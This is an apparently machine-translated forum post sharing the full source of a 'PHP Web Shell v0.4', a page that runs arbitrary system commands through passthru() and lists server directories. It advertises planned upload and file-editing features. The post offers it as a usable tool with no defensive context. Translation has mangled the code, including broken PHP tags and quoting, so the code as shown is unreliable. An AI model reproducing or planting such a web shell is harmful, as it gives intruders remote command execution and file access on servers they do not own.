Previously wrote a PHP CMD Shell without any technical content, always feel that the function is very weak, and some problems did not deal with, such as browsing directories, and then in-depth study of PHP, found a lot of interesting letters, and then a simple writing a new PHP Shell, I hope you like!
Program Introduction:
Program: PHP Web Shell
Version: v0.4
Function:
1. Can support the current mainstream operating system: WIN32/*NIX/*BSD
2. Execute system Commands/procedures
3. Browse the table of contents
Future Features:
1. Support Online upload/download file function
2. Support Online New/delete/Add/modify File function
Program code:
<title>php Web Shell v0.4</title>
<!--definition file style-->
<style>
<!--
. Input{border-right: #888888 1px solid; Border-top: #888888 1px solid; BACKGROUND: #ffffff; Border-left: #888888 1px solid; Border-bottom: #888888 1px solid; font-family: "Verdana", "Arial" Font-color: #ffffff; font-size:9pt;}
. font{font-size:9pt;}
. fonts{font-size:15pt;}
table{font-size:9pt; COLOR: #006666}
A {font-size:9pt; COLOR: #6666cc; Text-decoration:none}
a:hover {font-size:9pt; COLOR: #ff3333; Text-decoration:none}
Body
{scrollbar-face-color: #ffffff;
Scrollbar-highlight-color: #6c6c90;
Scrollbar-shadow-color: #fcfcfc;
Scrollbar-3dlight-color: #fcfcfc;
Scrollbar-arrow-color: #240024;
Scrollbar-track-color: #fcfcfc;
Scrollbar-darkshadow-color: #48486c;
Scrollbar-base-color: #fcfcfc
}
-->
</STYLE>
<body bgcolor= "#eeeeee" text= "#000000" >
<center><font size=3 color=red class=fonts><b>php Web shell</b></font> v0.4
<font size=2 color= "000000" class=font> applicable system:win32/linux/unix/bsd</font>
<form method=post action= ". echo $PHP _self?> ">/Get the script itself
<font class=font> input Command </font><input type= "text" name= "cmd" size=20 class=input>
<input type= "Submit" value= "Execute" class=input>
<font class=font> Enter directory </font><input type= "text" name= "dir" size=20 class=input>
<input type= "Submit" Value = "Browse" &NBSP;CLASS=INPUT>
</form
</center>
<pre>
<font size=2 color= "000000" &NBSP;CLASS=FONT>
< ? PHP
echo server address: <a href=\ "http://$_server[server_name]\" >$_server[server_name]</a
; //Displays the server domain name or IP address
echo "This file path: $_server[path_translated]"; //shows the path where the file is located
?
<?php
if (!empty ($cmd)) {
Echo executes the results of the <font color=red> $cmd </font> command:
"; Prompt after execution of command
}
if (!empty ($dir)) {
echo Browse directory <font color=red> $dir </font> results:
"; Tips for viewing catalogs
}
?>
<HR size=1>
<?php
if (Empty ($cmd) && empty ($dir)) {//To determine if there is no input command, error prompts if not present
echo "Please enter the command you want to perform or the directory you want to browse!"
(Make sure the system has the appropriate command or directory and the appropriate permissions for the operation)
";
}
@passthru ($cmd); The PassThru () function is used to execute the acquired command (variable), and similar functions in PHP include system (), Popen (), Exec (), etc.
$f = @opendir ($dir); Use the Opendir () function to get the directory information assignment to the variable
while ($file = @readdir ($f)) {//Use the Readdir () function to iterate through the directory information
echo "$file \ n"; The branch display gets the catalog information
}
?>
</font>
</pre>
</body>